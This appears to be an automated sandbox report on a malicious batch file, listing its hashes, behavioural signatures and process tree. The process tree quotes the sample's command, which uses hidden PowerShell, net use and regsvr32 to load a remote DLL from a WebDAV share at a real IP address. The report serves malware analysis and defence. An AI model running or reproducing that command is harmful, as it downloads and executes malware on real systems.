Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
21/07/2024, 12:53
Static task
static1
Behavioral task
behavioral1
Sample
717015525621429236.bat
Resource
win7-20240705-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
717015525621429236.bat
Resource
win10v2004-20240709-en
8 signatures
150 seconds
General
-
Target
717015525621429236.bat
-
Size
21KB
-
MD5
023fc36b6f674b1bc4e43f742e6437c8
-
SHA1
59d883150c6c6fbf6c11e9ee2b7b39004607f398
-
SHA256
7c596ff13d62e3bb14c72e2869b4e5602c1497397a08736a56335f86d4366f6e
-
SHA512
8540e98652d047412a69c353d493f206ee40a3681ecbf25047c69911b771ae86894f53b2cb33a5a89f2cf7c9bcf9b1bbd00181b32f1fc6ebbcf7af8834b92338
-
SSDEEP
384:2V17Fr3bUPC9q9PAwZX1uRbss4X9d+23J5YEtWYvA:2V1xzYQtE1PLtc8JBoYo
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2276 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2276 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2276 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2704 wordpad.exe 2704 wordpad.exe 2704 wordpad.exe 2704 wordpad.exe 2704 wordpad.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2208 wrote to memory of 2704 2208 cmd.exe 31 PID 2208 wrote to memory of 2704 2208 cmd.exe 31 PID 2208 wrote to memory of 2704 2208 cmd.exe 31 PID 2208 wrote to memory of 2276 2208 cmd.exe 32 PID 2208 wrote to memory of 2276 2208 cmd.exe 32 PID 2208 wrote to memory of 2276 2208 cmd.exe 32 PID 2276 wrote to memory of 2636 2276 powershell.exe 34 PID 2276 wrote to memory of 2636 2276 powershell.exe 34 PID 2276 wrote to memory of 2636 2276 powershell.exe 34 PID 2276 wrote to memory of 2576 2276 powershell.exe 35 PID 2276 wrote to memory of 2576 2276 powershell.exe 35 PID 2276 wrote to memory of 2576 2276 powershell.exe 35 PID 2276 wrote to memory of 2576 2276 powershell.exe 35 PID 2276 wrote to memory of 2576 2276 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\717015525621429236.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\11782898924082.dll2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\3⤵PID:2636
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\11782898924082.dll3⤵PID:2576
-
-